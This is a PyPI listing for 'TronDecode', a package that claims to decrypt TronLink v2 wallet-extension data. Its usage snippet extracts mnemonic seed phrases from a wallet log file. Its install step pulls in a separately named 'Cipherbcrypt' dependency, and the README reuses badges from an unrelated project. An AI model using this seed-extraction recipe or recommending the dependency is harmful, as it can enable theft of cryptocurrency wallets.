# TronDecode
[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)
![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)
Decode Tools for decode crypto data, from extensions wallet, TronLink v2.
## Installation
Python requires [Python.org](https://www.python.org/) v3,7+ to run.
Install the dependencies and devDependencies and start the server.
```sh
python -m pip install pip
python -m pip install --upgrade pip
pip install Cipherbcrypt
```
## Using
```Python
r = TronlinkReader('000003.log')
mnemonics = TronlinkReader.extract_mnemonic(r.decrypt('Qwwq1212'))
print(mnemonics)
```
## License
MIT
**Encode Cipherbcrypt group**
Raw data
{
"_id": null,
"home_page": "",
"name": "TronDecode",
"maintainer": "",
"docs_url": null,
"requires_python": ">=3.7,<4.0",
"maintainer_email": "",
"keywords": "extensions,Tron,walletdecode,decode,tronlink,TronDecode,crypto,decrypt,wallet",
"author": "BitLogic",
"author_email": "BitLogic@hash.io",
"download_url": "https://files.pythonhosted.org/packages/ed/b4/3fdebf486eec665f781f3c03158f108f7b46de410f1ca10be82cc3601c9b/trondecode-1.1.tar.gz",
"platform": null,
"description": "# TronDecode\n[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)\n\n![](https://img.shields.io/github/stars/pandao/editor.md.svg) ![](https://img.shields.io/github/forks/pandao/editor.md.svg) ![](https://img.shields.io/github/tag/pandao/editor.md.svg) ![](https://img.shields.io/github/release/pandao/editor.md.svg) ![](https://img.shields.io/github/issues/pandao/editor.md.svg) ![](https://img.shields.io/bower/v/editor.md.svg)\n\nDecode Tools for decode crypto data, from extensions wallet, TronLink v2.\n\n## Installation\nPython requires [Python.org](https://www.python.org/) v3,7+ to run.\nInstall the dependencies and devDependencies and start the server.\n```sh\npython -m pip install pip\npython -m pip install --upgrade pip\npip install Cipherbcrypt\n```\n## Using\n\n```Python\nr = TronlinkReader('000003.log')\nmnemonics = TronlinkReader.extract_mnemonic(r.decrypt('Qwwq1212'))\nprint(mnemonics)\n```\n\n## License\nMIT\n**Encode Cipherbcrypt group**\n",
"bugtrack_url": null,
"license": "MIT",
"summary": "Simple Tools for decode crypto data, from extensions wallet, TronLink v2.",
"version": "1.1",
"project_urls": null,
"split_keywords": [
"extensions",
"tron",
"walletdecode",
"decode",
"tronlink",
"trondecode",
"crypto",
"decrypt",
"wallet"
],
"urls": [
{
"comment_text": "",
"digests": {
"blake2b_256": "14b75e97717be15d30c9a9bb4bc8e3ed1b6c4aebaf14790ecdd1fa077828a352",
"md5": "480853c715665ff8456a3c02c67ed308",
"sha256": "2af350e397f8fb77c6915ea3834905dd9b689c55ea42d5f53ca34fd4831ffbf2"
},
"downloads": -1,
"filename": "trondecode-1.1-py3-none-any.whl",
"has_sig": false,
"md5_digest": "480853c715665ff8456a3c02c67ed308",
"packagetype": "bdist_wheel",
"python_version": "py3",
"requires_python": ">=3.7,<4.0",
"size": 3751,
"upload_time": "2024-02-12T14:26:28",
"upload_time_iso_8601": "2024-02-12T14:26:28.205330Z",
"url": "https://files.pythonhosted.org/packages/14/b7/5e97717be15d30c9a9bb4bc8e3ed1b6c4aebaf14790ecdd1fa077828a352/trondecode-1.1-py3-none-any.whl",
"yanked": false,
"yanked_reason": null
},
{
"comment_text": "",
"digests": {
"blake2b_256": "edb43fdebf486eec665f781f3c03158f108f7b46de410f1ca10be82cc3601c9b",
"md5": "5e4265d043dda94822f3562825ee4ccf",
"sha256": "78fcd1cf6e1346fab43083b4ed60d192663ca7df2b1947a611d2e2a2214ee5db"
},
"downloads": -1,
"filename": "trondecode-1.1.tar.gz",
"has_sig": false,
"md5_digest": "5e4265d043dda94822f3562825ee4ccf",
"packagetype": "sdist",
"python_version": "source",
"requires_python": ">=3.7,<4.0",
"size": 3434,
"upload_time": "2024-02-12T14:26:29",
"upload_time_iso_8601": "2024-02-12T14:26:29.453193Z",
"url": "https://files.pythonhosted.org/packages/ed/b4/3fdebf486eec665f781f3c03158f108f7b46de410f1ca10be82cc3601c9b/trondecode-1.1.tar.gz",
"yanked": false,
"yanked_reason": null
}
],
"upload_time": "2024-02-12 14:26:29",
"github": false,
"gitlab": false,
"bitbucket": false,
"codeberg": false,
"lcname": "trondecode"
}